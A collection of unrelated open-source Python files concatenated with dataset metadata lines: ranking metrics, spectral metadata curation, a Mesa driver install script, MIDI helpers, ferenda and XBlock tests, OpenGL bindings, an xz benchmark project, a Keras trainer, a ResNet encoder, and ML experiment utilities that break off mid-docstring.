            topk (int, optional): number of ranks to report. Default 10
        """
        for param, pred in zip(param_set, pred_set):
            print("param: {}".format(param))
            print(Metrics.generate(Ytrue, pred, topk=topk))
        for ens in [CsrEnsembler.average, CsrEnsembler.rank_average, CsrEnsembler.round_robin]:
            print("ens: {}".format(ens.__name__))
            print(Metrics.generate(Ytrue, ens(*pred_set), topk=topk))
class Metrics(collections.namedtuple("Metrics", ["prec", "recall"])):
    """Precision/recall metrics for multi-label classification problems."""

    __slots__ = ()

    def __str__(self):
        """Render each metric as a row of percentages, one line per field."""
        def fmt(key):
            return " ".join("{:4.2f}".format(100 * v) for v in getattr(self, key)[:])
        return "\n".join("{:7}= {}".format(key, fmt(key)) for key in self._fields)

    @classmethod
    def default(cls):
        """Return an empty (dummy) metric."""
        return cls(prec=[], recall=[])

    @classmethod
    def generate(cls, tY, pY, topk=10):
        """Compute precision@k and recall@k for k = 1..topk.

        Args:
            tY (csr_matrix): ground truth label matrix
            pY (csr_matrix): predicted logits
            topk (int, optional): only evaluate the topk predictions. Default 10

        Returns:
            Metrics
        """
        assert isinstance(tY, smat.csr_matrix), type(tY)
        assert isinstance(pY, smat.csr_matrix), type(pY)
        assert tY.shape == pY.shape, "tY.shape = {}, pY.shape = {}".format(tY.shape, pY.shape)
        pY = sorted_csr(pY)
        total_matched = np.zeros(topk, dtype=np.uint64)
        recall = np.zeros(topk, dtype=np.float64)
        for row in range(tY.shape[0]):
            truth = tY.indices[tY.indptr[row] : tY.indptr[row + 1]]
            top_pred = pY.indices[pY.indptr[row] : pY.indptr[row + 1]][:topk]
            cum_matched = np.cumsum(np.isin(top_pred, truth), dtype=np.uint64)
            denom = max(len(truth), 1)
            total_matched[: len(cum_matched)] += cum_matched
            recall[: len(cum_matched)] += cum_matched / denom
            if len(cum_matched) != 0:
                # pad ranks beyond this row's prediction depth with the final
                # cumulative count so P@k / R@k stay defined for every k
                total_matched[len(cum_matched) :] += cum_matched[-1]
                recall[len(cum_matched) :] += cum_matched[-1] / denom
        prec = total_matched / tY.shape[0] / np.arange(1, topk + 1)
        recall = recall / tY.shape[0]
        return cls(prec=prec, recall=recall)
| 2.625 | 3 |
MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 2 | 17665 | <reponame>xtrojak/pyMSPannotator
from matchms import utils
class Curator:
    """
    Curator makes sure that all data is curated before the actual annotation can proceed.

    Currently, fixing CAS numbers to correct format is supported.
    """

    def curate_spectra(self, spectra):
        """
        Curate every spectrum of the given collection in place.

        :param spectra: given spectrums
        :return: curated spectrums
        """
        for spectrum in spectra.spectrums:
            spectrum.metadata = self.curate_metadata(spectrum.metadata)
        return spectra

    def curate_metadata(self, metadata):
        """
        Curate metadata of a particular spectrum.

        :param metadata: given metadata
        :return: curated metadata
        """
        if 'casno' in metadata:
            metadata['casno'] = self.fix_cas_number(metadata['casno'])
        return metadata

    @staticmethod
    def fix_cas_number(cas_number):
        """
        Add dashes to a CAS number when they are missing.

        :param cas_number: given CAS number
        :return: CAS number enriched by dashes (if needed)
        """
        if "-" in cas_number:
            return cas_number
        # split as <prefix>-<two digits>-<check digit>
        return f'{cas_number[:-3]}-{cas_number[-3:-1]}-{cas_number[-1]}'

    @staticmethod
    def filter_invalid_metadata(metadata):
        """
        Validate metadata and drop attributes whose values fail validation.

        :param metadata: metadata content
        :return: only valid metadata
        """
        validators = {
            'smiles': utils.is_valid_smiles,
            'inchi': utils.is_valid_inchi,
            'inchikey': utils.is_valid_inchikey
        }
        valid_metadata = {}
        for attribute, value in metadata.items():
            validator = validators.get(attribute)
            # keep attributes without a validator, and validated values
            if validator is None or validator(value):
                valid_metadata[attribute] = value
        return valid_metadata
| 2.453125 | 2 |
bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 0 | 17666 | <filename>bin/install_megadrivers.py<gh_stars>0
#!/usr/bin/env python
# encoding=utf-8
# Copyright © 2017-2018 Intel Corporation
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Script to install megadriver symlinks for meson."""
from __future__ import print_function
import argparse
import os
import shutil
def main():
    """Install a megadriver and create per-driver hardlinks plus .so symlink chains.

    Copies the megadriver into the target libdir, hardlinks every requested
    driver name to it, builds the usual libfoo.so -> libfoo.so.X.Y chain for
    each, and finally removes the master copy.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('megadriver')
    parser.add_argument('libdir')
    parser.add_argument('drivers', nargs='+')
    args = parser.parse_args()

    # Resolve the destination directory, honouring DESTDIR for staged installs.
    if os.path.isabs(args.libdir):
        to = os.path.join(os.environ.get('DESTDIR', '/'), args.libdir[1:])
    else:
        to = os.path.join(os.environ['MESON_INSTALL_DESTDIR_PREFIX'], args.libdir)
    master = os.path.join(to, os.path.basename(args.megadriver))

    if not os.path.exists(to):
        os.makedirs(to)
    shutil.copy(args.megadriver, master)

    for driver_name in args.drivers:
        abs_driver = os.path.join(to, driver_name)

        if os.path.exists(abs_driver):
            os.unlink(abs_driver)
        print('installing {} to {}'.format(args.megadriver, abs_driver))
        os.link(master, abs_driver)

        # Build the chain of version symlinks by repeatedly stripping the
        # trailing extension until only the bare ".so" name remains.
        prev_cwd = os.getcwd()
        try:
            os.chdir(to)
            stem, suffix = os.path.splitext(driver_name)
            while suffix != '.so':
                if os.path.exists(stem):
                    os.unlink(stem)
                os.symlink(driver_name, stem)
                stem, suffix = os.path.splitext(stem)
        finally:
            os.chdir(prev_cwd)
    # the master copy was only needed as a hardlink source
    os.unlink(master)


if __name__ == '__main__':
    main()
| 1.992188 | 2 |
python_files/helpers.py | nilamo/pytchie | 10 | 17667 | #!/usr/bin/env python
import os
import sys
def midi_to_freq(num):
    """Convert a MIDI note number to its frequency in Hz (A4 = MIDI 69 = 440 Hz)."""
    semitones_from_a4 = num - 69
    # equal temperament: one octave (12 semitones) doubles the frequency
    return 440 * 2 ** (semitones_from_a4 / 12.0)
def fp(relative):
    """Resolve a resource path; currently a pass-through of the given relative path."""
    # The commented-out branch handled PyInstaller bundles, where resources
    # live under the temporary extraction dir sys._MEIPASS. It is disabled;
    # re-enable it if the app is frozen with PyInstaller again.
    #if hasattr(sys, "_MEIPASS"):
    #    return os.path.join(sys._MEIPASS, relative)
    return os.path.join(relative)
if __name__ == '__main__':
    # quick manual check: A4 (69) -> 440 Hz, middle C (60) -> ~261.63 Hz,
    # and MIDI 105 (three octaves above A4) -> 3520 Hz
    print(midi_to_freq(69))
    print(midi_to_freq(60))
    print(midi_to_freq(105))
| 3.25 | 3 |
test/integrationMyndFskr.py | redhog/ferenda | 18 | 17668 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import *
import os
import sys
import shutil
import inspect
from ferenda import TextReader, util
from ferenda.testutil import RepoTester, file_parametrize
from ferenda.compat import unittest
# SUT
from ferenda.sources.legal.se import myndfskr
class Parse(RepoTester):
    """Data-driven parse tests for the myndfskr repos: every sample .txt under
    test/files/myndfskr is parsed and the extracted metadata graph is compared
    against the expected .n3 file next to it."""

    repoclass = myndfskr.MyndFskrBase # in some cases we might need to get a
    # specific one like SOSFS, see below
    aliases = {} # setUpClass fills this in

    @classmethod
    def setUpClass(cls):
        """Collect every repo class in the myndfskr module, keyed by its alias."""
        super(Parse, cls).setUpClass()
        # enumerate all classes defined in the module where
        # MyndFskrBase is defined, check their static property 'alias'
        # and use it to add to cls.aliases
        for name, obj in inspect.getmembers(myndfskr):
            if inspect.isclass(obj) and hasattr(obj, 'alias'):
                cls.aliases[obj.alias] = obj

    def parse_filename(self, filename):
        """Derive (repo instance, basefile) from a sample filename.

        The part before the first "-" selects the repo class by alias; the
        whole stem becomes the basefile, e.g. "sosfs-2014-5.txt" maps to
        basefile "sosfs/2014:5".
        """
        # a few of the subclasses have specialized rules. make sure we
        # instantiate the correct class
        alias = os.path.basename(filename).split("-")[0]
        basefile = os.path.splitext(
            os.path.basename(filename))[0].replace("-",
                                                   "/", 1).replace("-", ":")
        repoclass = self.aliases[alias]
        repo = repoclass(datadir=self.datadir,
                         storelocation=self.datadir + "/ferenda.sqlite",
                         indexlocation=self.datadir + "/whoosh",)
        return repo, basefile

    def parametric_test(self, filename):
        """Parse one sample file through the repo's metadata pipeline and
        compare the resulting graph against the expected .n3 file; if that
        file is missing, fail while printing the serialized graph so the
        expectation can be created from it."""
        # these options adjusts the constructed URIs. by default, the
        # official rpubl URIs are minted.
        #
        # self.repo.config.localizeuri = True
        # self.repo.config.url = "http://example.org/"
        # self.repo.config.urlpath = ''

        # a few of the subclasses have specialized rules. make sure we
        # instantiate the correct class
        repo, basefile = self.parse_filename(filename)
        doc = repo.make_document(basefile)
        text = repo.sanitize_text(util.readfile(filename), basefile)
        reader = TextReader(string=text, encoding='utf-8')
        props = repo.extract_metadata(reader, basefile)
        props = repo.sanitize_metadata(props, basefile)
        resource = repo.polish_metadata(props, basefile)
        repo.infer_metadata(resource, basefile)

        wantfile = filename.replace(".txt", ".n3")
        if os.path.exists(wantfile):
            # exact=False: presumably the expected graph only needs to be
            # contained in the extracted one -- TODO confirm in RepoTester docs
            self.assertEqualGraphs(wantfile, resource.graph, exact=False)
        else:
            self.fail("Expected a %s with the following content:\n\n%s" %
                      (wantfile, doc.meta.serialize(format="n3").decode("utf-8")))
# generate one test method on Parse for every .txt file under the data dir
file_parametrize(Parse, "test/files/myndfskr", ".txt")
| 2.234375 | 2 |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | 0 | 17669 | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_NV_geometry_program4'
def _f( function ):
    """Bind an extension entry point lazily through the GL platform loader,
    attaching the standard GL error checker."""
    return _p.createFunction( function,_p.PLATFORM.GL,'GL_NV_geometry_program4',error_checker=_errors._error_checker)
# Extension enumerant constants (autogenerated from the Khronos XML registry).
GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT',0x8DA7)
GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT',0x8CD4)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT',0x8DA9)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT',0x8DA8)
GL_GEOMETRY_INPUT_TYPE_EXT=_C('GL_GEOMETRY_INPUT_TYPE_EXT',0x8DDB)
GL_GEOMETRY_OUTPUT_TYPE_EXT=_C('GL_GEOMETRY_OUTPUT_TYPE_EXT',0x8DDC)
GL_GEOMETRY_PROGRAM_NV=_C('GL_GEOMETRY_PROGRAM_NV',0x8C26)
GL_GEOMETRY_VERTICES_OUT_EXT=_C('GL_GEOMETRY_VERTICES_OUT_EXT',0x8DDA)
GL_LINES_ADJACENCY_EXT=_C('GL_LINES_ADJACENCY_EXT',0x000A)
GL_LINE_STRIP_ADJACENCY_EXT=_C('GL_LINE_STRIP_ADJACENCY_EXT',0x000B)
GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT=_C('GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT',0x8C29)
GL_MAX_PROGRAM_OUTPUT_VERTICES_NV=_C('GL_MAX_PROGRAM_OUTPUT_VERTICES_NV',0x8C27)
GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV=_C('GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV',0x8C28)
GL_PROGRAM_POINT_SIZE_EXT=_C('GL_PROGRAM_POINT_SIZE_EXT',0x8642)
GL_TRIANGLES_ADJACENCY_EXT=_C('GL_TRIANGLES_ADJACENCY_EXT',0x000C)
GL_TRIANGLE_STRIP_ADJACENCY_EXT=_C('GL_TRIANGLE_STRIP_ADJACENCY_EXT',0x000D)
# ctypes signatures for the extension's entry points; the decorated stubs are
# replaced by callable foreign functions via the _f wrapper at import time.
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,_cs.GLuint,_cs.GLint)
def glFramebufferTextureEXT(target,attachment,texture,level):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,_cs.GLuint,_cs.GLint,_cs.GLenum)
def glFramebufferTextureFaceEXT(target,attachment,texture,level,face):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,_cs.GLuint,_cs.GLint,_cs.GLint)
def glFramebufferTextureLayerEXT(target,attachment,texture,level,layer):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glProgramVertexLimitNV(target,limit):pass
| 1.507813 | 2 |
benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | 11 | 17670 | from plumbum import local
import benchbuild as bb
from benchbuild.environments.domain.declarative import ContainerImage
from benchbuild.source import HTTP
from benchbuild.utils.cmd import make, tar
class XZ(bb.Project):
""" XZ """
VERSION = '5.2.1'
NAME = 'xz'
DOMAIN = 'compression'
GROUP = 'benchbuild'
SOURCE = [
HTTP(
remote={'5.2.1': 'http://tukaani.org/xz/xz-5.2.1.tar.gz'},
local='xz.tar.gz'
),
HTTP(
remote={'1.0': 'http://lairosiel.de/dist/compression.tar.gz'},
local='compression.tar.gz'
)
]
CONTAINER = ContainerImage().from_('benchbuild:alpine')
def compile(self):
xz_source = local.path(self.source_of('xz.tar.gz'))
xz_version = self.version_of('xz.tar.gz')
compression_source = local.path(self.source_of('compression.tar.gz'))
tar('xf', xz_source)
tar('xf', compression_source)
unpack_dir = local.path(f'xz-{xz_version}')
clang = bb.compiler.cc(self)
with local.cwd(unpack_dir):
configure = local["./configure"]
_configure = bb.watch(configure)
with local.env(CC=str(clang)):
_configure(
"--enable-threads=no", "--with-gnu-ld=yes",
"--disable-shared", "--disable-dependency-tracking",
"--disable-xzdec", "--disable-lzmadec",
"--disable-lzmainfo", "--disable-lzma-links",
"--disable-scripts", "--disable-doc"
)
_make = bb.watch(make)
_make("CC=" + str(clang), "clean", "all")
def run_tests(self):
xz_version = self.version_of('xz.tar.gz')
unpack_dir = local.path(f'xz-{xz_version}')
xz = bb.wrap(unpack_dir / "src" / "xz" / "xz", self)
_xz = bb.watch(xz)
# Compress
_xz("--compress", "-f", "-k", "-e", "-9", "compression/text.html")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/chicken.jpg")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/control")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/input.source")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/liberty.jpg")
# Decompress
_xz("--decompress", "-f", "-k", "compression/text.html.xz")
_xz("--decompress", "-f", "-k", "compression/chicken.jpg.xz")
_xz("--decompress", "-f", "-k", "compression/control.xz")
_xz("--decompress", "-f", "-k", "compression/input.source.xz")
_xz("--decompress", "-f", "-k", "compression/liberty.jpg.xz")
| 2.140625 | 2 |
train.py | sazzad/CarND-Behavioral-Cloning-P3 | 0 | 17671 | import numpy as np
import csv
import cv2
from keras.models import Sequential
from keras.layers import Dense, Flatten
def load_data():
    """Load training images and steering measurements from disk.

    Reads Data/driving_log.csv, loads the center-camera image referenced in
    column 0 of each row from Data/IMG/, and pairs it with the steering
    angle found in column 3.

    Returns:
        (X_train, y_train): numpy arrays of images and steering angles.
    """
    images = []
    measurements = []
    with open('Data/driving_log.csv') as csvfile:
        for row in csv.reader(csvfile):
            # The CSV stores absolute paths; keep only the basename and
            # re-root it under the local Data/IMG directory.
            filename = row[0].split('/')[-1]
            image = cv2.imread('Data/IMG/' + filename)
            images.append(image)
            measurements.append(float(row[3]))
    return np.array(images), np.array(measurements)
def train(X_train, y_train):
    """Train and save a minimal steering-angle regression model.

    Builds a single-layer linear model (Flatten -> Dense(1)), trains it with
    MSE loss and the Adam optimizer on an 80/20 train/validation split, and
    writes the result to model.h5.

    Args:
        X_train: array of input images, shape (N, 160, 320, 3).
        y_train: array of steering measurements, shape (N,).
    """
    model = Sequential()
    model.add(Flatten(input_shape=(160, 320, 3)))
    model.add(Dense(1))
    model.compile(loss='mse', optimizer='adam')
    # Bug fix: 'nb_epoch' is the Keras 1 spelling of this keyword and is
    # rejected (TypeError) by Keras 2+; 'epochs' is the supported name.
    model.fit(X_train, y_train, validation_split=0.2, shuffle=True, epochs=10)
    model.save('model.h5')
model.save('model.h5')
if __name__ == "__main__":
    # Script entry point: load the dataset, then train and save the model.
    X_train, y_train = load_data()
    train(X_train, y_train)
models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | 2 | 17672 | from abc import get_cache_token
from collections import OrderedDict
from torch import nn
class ResidualBlock(nn.Module):
    """Generic residual block: output = blocks(x) + (shortcut(x) or x).

    Subclasses replace `blocks` (the transformation path) and `shortcut`
    (the projection applied to the skip connection when the input and
    output widths differ). With the default Identity modules the block is
    a no-op transformation plus a plain skip connection.
    """

    def __init__(self, in_size, out_size):
        super().__init__()
        self.in_size, self.out_size = in_size, out_size
        self.blocks = nn.Identity()
        self.shortcut = nn.Identity()

    def forward(self, x):
        # Project the skip connection only when the widths differ.
        skip = self.shortcut(x) if self.should_apply_shortcut else x
        out = self.blocks(x)
        out += skip
        return out

    @property
    def should_apply_shortcut(self):
        # A learned projection is only needed when the width changes.
        return self.in_size != self.out_size
# 用来处理short cut
class ResNetResidualBlock(ResidualBlock):
def __init__(self, in_size, out_size):
super().__init__(in_size, out_size)
self.shortcut = nn.Sequential(OrderedDict(
{
'dense': nn.Linear(self.in_size, self.out_size),
# 'bn': nn.BatchNorm1d(self.out_size)
})) if self.should_apply_shortcut else None
@property
def should_apply_shortcut(self):
return self.in_size != self.out_size
# 来定义一个block
class ResNetBasicBlock(ResNetResidualBlock):
def __init__(self, in_size, out_size, activation=nn.ReLU):
super().__init__(in_size, out_size)
self.blocks = nn.Sequential(
nn.Linear(self.in_size, self.out_size),
activation(),
nn.Linear(self.out_size, self.out_size),
)
# 定义一个resnet层,里面会有多个block
class ResNetLayer(nn.Module):
def __init__(self, in_size, out_size, block=ResNetBasicBlock, n=1, activation=nn.ReLU):
super().__init__()
self.blocks = nn.Sequential(
block(in_size, out_size, activation),
*[block(out_size,
out_size, activation) for _ in range(n-1)]
)
def forward(self, x):
x = self.blocks(x)
return x
# 由多个resnet layer组成encoder
class ResNetEncoder(nn.Module):
"""
ResNet encoder composed by decreasing different layers with increasing features.
"""
def __init__(self, in_size=128, blocks_sizes=[64, 32, 16], deepths=[2, 2, 2],
activation=nn.ReLU, block=ResNetBasicBlock):
super().__init__()
self.blocks_sizes = blocks_sizes
self.gate = nn.Sequential(
nn.Linear(in_size, self.blocks_sizes[0]),
# nn.BatchNorm1d(self.blocks_sizes[0]),
activation(),
)
self.in_out_block_sizes = list(zip(blocks_sizes, blocks_sizes[1:]))
self.blocks = nn.ModuleList([
*[ResNetLayer(in_size, out_size, n=n, activation=activation, block=block)
for (in_size, out_size), n in zip(self.in_out_block_sizes, deepths)]
])
def forward(self, x):
x = self.gate(x)
for block in self.blocks:
x = block(x)
return x
if __name__ == "__main__":
    # Quick self-check: instantiate the default encoder and report its size.
    m = ResNetEncoder()

    def get_parameter_number(net):
        # Count all parameters and the trainable subset of a torch module.
        total_num = sum(p.numel() for p in net.parameters())
        trainable_num = sum(p.numel()
                            for p in net.parameters() if p.requires_grad)
        return {'Total': total_num, 'Trainable': trainable_num}

    print(get_parameter_number(m))
| 2.40625 | 2 |
xblock/test/test_json_conversion.py | edly-io/XBlock | 0 | 17673 | """
Tests asserting that ModelTypes convert to and from json when working
with ModelDatas
"""
# Allow inspection of private class members
# pylint: disable=protected-access
from mock import Mock
from xblock.core import XBlock
from xblock.fields import Field, Scope, ScopeIds
from xblock.field_data import DictFieldData
from xblock.test.tools import TestRuntime
class TestJSONConversionField(Field):
    """Field whose JSON form is the tagged dict {'$type': 'set', '$vals': [...]}."""
    __test__ = False

    def from_json(self, value):
        # Only the tagged-set encoding is accepted.
        assert value['$type'] == 'set'
        return set(value['$vals'])

    def to_json(self, value):
        # Sort the members so the serialized form is deterministic.
        payload = {'$type': 'set', '$vals': sorted(value)}
        return payload
class TestBlock(XBlock):
    """XBlock for testing json conversion: two set-valued content fields
    that use the tagged-set encoding from TestJSONConversionField."""
    __test__ = False

    field_a = TestJSONConversionField(scope=Scope.content)
    field_b = TestJSONConversionField(scope=Scope.content)
field_b = TestJSONConversionField(scope=Scope.content)
class TestModel(DictFieldData):
    """Field data that serves a fixed tagged-set payload as every default."""
    __test__ = False

    def default(self, block, name):
        # Any field without a stored value defaults to the JSON encoding
        # of the set {0, 1}.
        default_payload = {'$type': 'set', '$vals': [0, 1]}
        return default_payload
class TestJsonConversion:
    """
    Verify that all ModelType operations correctly convert
    the json that comes out of the ModelData to python objects
    """

    def setup_method(self):
        """
        Setup for each test method in this class.
        """
        # field_a has an explicit stored value; field_b will fall back to
        # TestModel.default, which also yields the tagged-set encoding.
        field_data = TestModel({
            'field_a': {'$type': 'set', '$vals': [1, 2, 3]}
        })
        runtime = TestRuntime(services={'field-data': field_data})
        self.block = TestBlock(runtime, scope_ids=Mock(spec=ScopeIds))  # pylint: disable=attribute-defined-outside-init

    def test_get(self):
        # Test field with a value: stored JSON is decoded back to a set.
        assert isinstance(self.block.field_a, set)
        # Test ModelData default: the default payload is decoded too.
        assert isinstance(self.block.field_b, set)

    def test_set(self):
        # The duplicate 5 collapses because the value is a set.
        self.block.field_b = set([5, 6, 5])
        self.block.save()
        assert isinstance(self.block.field_b, set)
        # After save(), the raw field data holds the sorted JSON encoding.
        assert {'$type': 'set', '$vals': [5, 6]} == \
            self.block._field_data.get(self.block, 'field_b')
| 2.828125 | 3 |
uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 0 | 17674 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities to help set up and run experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path
from absl import logging
import numpy as np
import scipy.special
from six.moves import range
from six.moves import zip
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
gfile = tf.io.gfile
class _SimpleJsonEncoder(json.JSONEncoder):
def default(self, o):
return o.__dict__
def json_dumps(x):
  """Serialize x to pretty-printed JSON, tolerating simple config objects."""
  return json.dumps(x, cls=_SimpleJsonEncoder, indent=2)
def record_config(config, path):
  """Serialize `config` to JSON and write it to `path`, creating parent dirs."""
  serialized = json_dumps(config)
  logging.info('Recording config to %s\n %s', path, serialized)
  gfile.makedirs(os.path.dirname(path))
  with gfile.GFile(path, 'w') as fh:
    fh.write(serialized)
def load_config(path):
  """Read a JSON config from `path` and return the parsed object."""
  logging.info('Loading config from %s', path)
  with gfile.GFile(path) as fh:
    contents = fh.read()
  return json.loads(contents)
def save_model(model, output_dir):
  """Save Keras model weights and architecture as an HDF5 file.

  The optimizer state is deliberately excluded; returns the written path.
  """
  save_path = output_dir + '/model.hdf5'
  logging.info('Saving model to %s', save_path)
  model.save(save_path, include_optimizer=False)
  return save_path
def load_model(path):
  """Load a Keras model previously written by `save_model`."""
  logging.info('Loading model from %s', path)
  loaded = tf.keras.models.load_model(path)
  return loaded
def metrics_from_stats(stats):
  """Compute metrics to report to hyperparameter tuner.

  Args:
    stats: dict with 'labels' (shape [N]) and 'probs' (shape [N, K], or
      shape [N] for binary problems, which is expanded to two classes).

  Returns:
    dict with scalar 'accuracy', 'brier_score' and 'log_prob' values, each
    averaged over the N examples.
  """
  labels = stats['labels']
  probs = stats['probs']
  # Reshape binary predictions [N] to an explicit 2-class array [N, 2].
  if len(probs.shape) == 1:
    probs = np.stack([1 - probs, probs], axis=-1)
  assert len(probs.shape) == 2

  predicted_class = np.argmax(probs, axis=-1)
  correct = np.equal(labels, predicted_class)
  prob_of_label = probs[np.arange(len(labels)), labels]
  # Floor the log at -1e10 so zero-probability labels stay finite.
  log_prob_of_label = np.maximum(-1e10, np.log(prob_of_label))
  # Brier score in the sum(p^2) - 2*p_label form (lower is better).
  brier = np.square(probs).sum(-1) - 2 * prob_of_label
  return {'accuracy': correct.mean(0),
          'brier_score': brier.mean(0),
          'log_prob': log_prob_of_label.mean(0)}
def make_predictions(
    model, batched_dataset, predictions_per_example=1, writers=None,
    predictions_are_logits=True, record_image_samples=True, max_batches=1e6):
  """Build a dictionary of predictions for examples from a dataset.

  Args:
    model: Trained Keras model.
    batched_dataset: tf.data.Dataset that yields batches of image, label pairs.
    predictions_per_example: Number of predictions to generate per example.
    writers: `dict` with keys 'small' and 'full', containing
      array_utils.StatsWriter instances for full prediction results and small
      prediction results (omitting logits).
    predictions_are_logits: Indicates whether model outputs are logits or
      probabilities.
    record_image_samples: `bool` Record one batch of input examples.
    max_batches: `int`, maximum number of batches.
  Returns:
    Dictionary containing:
      labels: Labels copied from the dataset (shape=[N]).
      logits_samples: Samples of model predict outputs for each example
        (shape=[N, M, K]).
      probs: Probabilities after averaging over samples (shape=[N, K]).
      image_samples: One batch of input images (for sanity checking).
  """
  # Pick the output key and the "average the M samples into probs"
  # reduction to match the model's output space.
  if predictions_are_logits:
    samples_key = 'logits_samples'
    avg_probs_fn = lambda x: scipy.special.softmax(x, axis=-1).mean(-2)
  else:
    samples_key = 'probs_samples'
    avg_probs_fn = lambda x: x.mean(-2)

  labels, outputs = [], []
  # Support both Keras models (model.predict) and bare callables.
  predict_fn = model.predict if hasattr(model, 'predict') else model
  for i, (inputs_i, labels_i) in enumerate(tfds.as_numpy(batched_dataset)):
    logging.info('iteration: %d', i)
    # Stack M stochastic forward passes along axis 1 -> [batch, M, K].
    outputs_i = np.stack(
        [predict_fn(inputs_i) for _ in range(predictions_per_example)], axis=1)

    if writers is None:
      # In-memory path: accumulate and assemble the stats dict at the end.
      labels.extend(labels_i)
      outputs.append(outputs_i)
    else:
      # Streaming path: 'small' gets averaged probs only; 'full' also
      # receives the raw per-sample outputs.
      avg_probs_i = avg_probs_fn(outputs_i)
      prediction_batch = dict(labels=labels_i, probs=avg_probs_i)
      if i == 0 and record_image_samples:
        prediction_batch['image_samples'] = inputs_i
      writers['small'].write_batch(prediction_batch)
      prediction_batch[samples_key] = outputs_i
      writers['full'].write_batch(prediction_batch)

    # Don't predict whole ImageNet training set
    # NOTE(review): strict '>' means max_batches+2 batches are processed;
    # confirm whether the off-by-one matters to callers.
    if i > max_batches:
      break
  if writers is None:
    image_samples = inputs_i  # pylint: disable=undefined-loop-variable
    labels = np.stack(labels, axis=0)
    outputs = np.concatenate(outputs, axis=0)
    # NOTE(review): 'image_samples' is included here unconditionally and
    # again below; the record_image_samples flag cannot actually omit it.
    stats = {'labels': labels, 'image_samples': image_samples,
             samples_key: outputs, 'probs': avg_probs_fn(outputs)}
    if record_image_samples:
      stats['image_samples'] = image_samples
    return stats
def download_dataset(dataset, batch_size_for_dl=1024):
  """Materialize a tf.data.Dataset into in-memory numpy arrays.

  Args:
    dataset: tf.data.Dataset yielding tuples (e.g. (image, label)).
    batch_size_for_dl: batch size used while iterating the dataset.

  Returns:
    A tuple of numpy arrays, one per dataset component.
  """
  logging.info('Starting dataset download...')
  # Batch, convert to numpy, then transpose [(x, y), ...] into ([x...], [y...]).
  tup = list(zip(*tfds.as_numpy(dataset.batch(batch_size_for_dl))))
  logging.info('dataset download complete.')
  return tuple(np.concatenate(x, axis=0) for x in tup)
def get_distribution_strategy(distribution_strategy='default',
                              num_gpus=0,
                              num_workers=1,
                              all_reduce_alg=None,
                              num_packs=1):
  """Return a DistributionStrategy for running the model.

  Args:
    distribution_strategy: a string specifying which distribution strategy to
      use. Accepted values are 'off', 'default', 'one_device', 'mirrored',
      'parameter_server', 'multi_worker_mirrored', case insensitive. 'off' means
      not to use Distribution Strategy; 'default' means to choose from
      `MirroredStrategy`, `MultiWorkerMirroredStrategy`, or `OneDeviceStrategy`
      according to the number of GPUs and number of workers.
    num_gpus: Number of GPUs to run this model.
    num_workers: Number of workers to run this model.
    all_reduce_alg: Optional. Specifies which algorithm to use when performing
      all-reduce. For `MirroredStrategy`, valid values are 'nccl' and
